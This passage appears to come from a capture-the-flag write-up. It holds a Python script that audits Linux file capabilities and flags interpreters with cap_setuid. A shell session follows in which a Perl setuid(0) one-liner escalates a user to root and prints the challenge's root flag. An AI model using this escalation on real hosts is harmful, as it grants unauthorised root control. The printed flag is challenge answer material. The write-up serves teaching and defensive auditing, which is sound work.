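    "cap_setfcap": "can put capabilities on other binaries",
}

# Interpreters are the worst carriers: the capability applies to any script.
_INTERPRETER = re.compile(r"^(perl|python|ruby|node|php|lua|bash|sh)(\d.*)?$")
# One capability clause: names, then operator/flag characters (+ = - e i p).
_CLAUSE = re.compile(r"^(?P<names>[a-z0-9_,]*)(?P<ops>[+=\-eip]+)$")


def parse_getcap_line(line):
    """Return (path, {capability names}) or None for lines that are not findings.
    Accepts 'PATH = cap+ep' (older libcap) and 'PATH cap=ep' (newer getcap).
    Assumes the path contains no whitespace."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if " = " in line:
        path, caps = line.split(" = ", 1)
    else:
        parts = line.rsplit(None, 1)
        if len(parts) != 2:
            return None
        path, caps = parts
    names = set()
    for clause in caps.split():
        m = _CLAUSE.match(clause)
        if m is None:
            return None
        raw = m.group("names")
        if raw in ("", "all"):
            names.add("all")  # bare '=ep' or 'all=ep' means every capability
        else:
            names.update(raw.split(","))
    return path, names


def audit_capabilities(lines):
    """Return one finding per file that carries a HIGH_RISK capability."""
    findings = []
    for line in lines:
        parsed = parse_getcap_line(line)
        if parsed is None:
            continue
        path, names = parsed
        risky = set(HIGH_RISK) if "all" in names else names & set(HIGH_RISK)
        if not risky:
            continue
        basename = path.rsplit("/", 1)[-1]
        findings.append({
            "path": path,
            "capabilities": sorted(risky),
            "why": [HIGH_RISK[c] for c in sorted(risky)],
            "interpreter": bool(_INTERPRETER.match(basename)),
            "remediation": f"setcap -r {path}",  # strips the file capability
        })
    return findings


def collect_getcap(root="/"):
    """Run getcap on the live host; tries PATH first, then the sbin copies
    (on this machine getcap was only reachable as /sbin/getcap)."""
    for exe in ("getcap", "/sbin/getcap", "/usr/sbin/getcap"):
        try:
            out = subprocess.run([exe, "-r", root], capture_output=True, text=True)
        except FileNotFoundError:
            continue
        return out.stdout.splitlines()
    raise RuntimeError("getcap not found; install libcap2-bin")


# Sample input: the two real lines from the session above plus constructed ones.
SAMPLE_GETCAP_OUTPUT = [
    "/usr/bin/perl5.28.1 = cap_setuid+ep",
    "/usr/bin/perl = cap_setuid+ep",
    "/usr/bin/ping = cap_net_raw+ep",                     # constructed, normal default
    "/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+eip",  # constructed, not root-equivalent
    "/usr/bin/python3.11 cap_dac_read_search=ep",        # constructed, newer output format
]

if __name__ == "__main__":
    for f in audit_capabilities(SAMPLE_GETCAP_OUTPUT):
        tag = "INTERPRETER " if f["interpreter"] else ""
        print(f"{tag}{f['path']}: {', '.join(f['capabilities'])} -> {f['remediation']}")
```

On a host, feed `collect_getcap()` into `audit_capabilities()`; the sample list lets the logic run offline. The remediation string uses `setcap -r PATH`, which removes the file capability; the durable fix is to grant no capability to an interpreter at all and, where one is genuinely needed, to attach it to a small dedicated binary instead.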
bart@shop:/tmp$
bart@shop:/tmp$ /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
root@shop:/tmp# whoami
root
root@shop:/tmp#
root@shop:/tmp# find / -name *root.txt 2>/dev/null
/root/root.txt
root@shop:/tmp# cd /root/
root@shop:/root# ls
root.txt
Gotcha! We have discovered the root flag.
root@shop:/root# cat root.txt
1c4cddb6c20e0e756163b2a9714a1260
I hope you liked it and learned something new.
This article was written for ethical purposes.
Good Hack